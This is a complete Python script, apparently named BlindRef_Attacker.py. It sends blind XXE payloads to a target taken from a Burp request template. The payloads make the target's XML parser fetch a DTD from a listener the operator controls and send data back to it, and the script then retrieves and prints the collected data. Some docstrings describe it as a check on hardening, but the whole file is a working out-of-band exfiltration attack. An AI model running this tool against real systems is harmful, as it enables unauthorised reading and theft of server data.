#!/usr/bin/env python
# -*- coding: utf-8 -*-
import ast
import copy
import getopt
import json
import re
import sys
import urllib2

import requests
# Module-wide state, populated by main() from the command-line options:
#   serverURL / serverPort  - the collaborating listener the probes point at
#   webRequest              - text of the "Copy as requests" template file
# All three start out empty; strings are immutable so sharing one literal is safe.
serverURL = serverPort = webRequest = ""
def getInfo():
    """Drive one full run: ask the listener how many payloads it holds,
    send one probe per payload, then fetch and print what was collected.

    Relies on the module globals serverURL and serverPort having been set.
    """
    base = str(serverURL) + ":" + str(serverPort)
    # /getInfo is expected to answer with a bare integer in the body;
    # anything else makes int() raise ValueError.
    count = int(requests.get(base + "/getInfo").content)
    for _ in range(count):
        # Each probe makes the target fetch our DTD and report back.
        submitRequest()
    getFinalDetails()
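def submitRequest():
    """Send a single XXE probe to the target described by ``webRequest``.

    ``webRequest`` holds the text produced by Burp's "Copy as requests"
    extension.  The target URL and the ``headers=`` dict literal are cut
    out of that text; the body is replaced by a DOCTYPE whose parameter
    entity points at ``ev.xml`` on our listener.  A parser that resolves
    external parameter entities fetches that DTD and, through the
    ``%content;`` entity it defines, issues a follow-up request carrying
    data back to the listener.  A parser with DTD / external-entity
    resolution disabled makes neither request, which is exactly the
    hardening this check confirms.

    Raises:
        IndexError: the template lacks the expected ``import requests`` /
            ``headers=`` / ``, data`` markers.
        ValueError, SyntaxError: the ``headers=`` section is not a plain
            Python dict literal.
    """
    # Probe body, kept verbatim from the original tool.
    BLINDREF = '<?xml version=\"1.0\" ?>\r\n<!DOCTYPE xxeElement [\r\n<!ELEMENT xxeElement ANY >\r\n<!ENTITY % xxeEntity SYSTEM \"'
    BLINDREF += serverURL + ":" + str(serverPort) + '/ev.xml\">'
    BLINDREF += '\r\n%xxeEntity;\r\n%content;\r\n]>\r\n<xxeElement>&xxeEntity;</xxeElement>'
    # The target URL is the first double-quoted string in the template
    # (the old second split on '"' was a no-op and is dropped).
    finalURL = webRequest.split('"')[1]
    # The header dict literal sits between 'headers=' and ', data' in the
    # part of the template that follows the 'import requests' line.
    burpRequest = webRequest.split("import requests")[1]
    finalHeaders = burpRequest.split("headers=")[1].split(", data")[0]
    # literal_eval rather than eval: the template is an arbitrary text file
    # supplied on the command line, so only a dict literal is accepted,
    # never executable Python.
    headers = ast.literal_eval(finalHeaders)
    requests.post(finalURL, data=BLINDREF, headers=headers)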
def help():
    """Write the one-line usage banner to stdout.

    Shadows the builtin help(); the name is kept because main() calls it.
    """
    usage = 'BlindRef_Attacker.py -s serverURL -p serverPort -r webRequest'
    sys.stdout.write(usage + "\n")
def getFinalDetails():
    """Fetch what the listener collected, print it tidied up, then reset
    the listener so the next run starts clean."""
    endpoint = str(serverURL) + ":" + str(serverPort) + "/getFinalDetails"
    raw = requests.get(endpoint).content
    # Undo URL-encoded newlines and drop the "/?" the server leaves in
    # front of the collected data.
    cleaned = raw.replace("%0A", "\n").replace("/?", "")
    print(cleaned)
    reset()
def reset():
    """Tell the listener to discard everything it has collected so far."""
    endpoint = "%s:%s/reset" % (serverURL, serverPort)
    requests.get(endpoint)
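def main(argv):
    """Parse the command line, load the request template and run the check.

    Args:
        argv: command-line arguments without the program name.

    Exits through sys.exit() when the options cannot be parsed, when -h is
    given, when anything other than exactly -s/-p/-r is supplied, or when
    the template file named by -r cannot be read.
    """
    global serverURL, serverPort, webRequest
    webRequestLocation = ""
    try:
        opts, _args = getopt.getopt(argv, "hs:p:r:", ["server=", "port=", "webrequest="])
    except getopt.GetoptError:
        help()
        sys.exit()
    # All three of -s, -p and -r are required; any other count prints usage.
    if len(opts) != 3:
        help()
        sys.exit()
    for opt, arg in opts:
        if opt == '-h':
            help()
            sys.exit()
        elif opt in ("-s", "--server"):
            serverURL = arg
        elif opt in ("-p", "--port"):
            serverPort = arg
        elif opt in ("-r", "--webrequest"):
            webRequestLocation = arg
    # Read the template after the option loop so a missing -r is caught
    # here (open("") fails) instead of surfacing later as a parse error.
    # Only the file access sits inside the try, and only I/O errors are
    # handled; the old bare `except Exception` also hid programming errors.
    try:
        with open(webRequestLocation, 'r') as content_file:
            webRequest = content_file.read()
    except (IOError, OSError):
        print("Unable to parse file.")
        sys.exit()
    getInfo()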
# Script entry point: pass the arguments (minus the program name) to main().
if __name__ == '__main__':
    main(sys.argv[1:])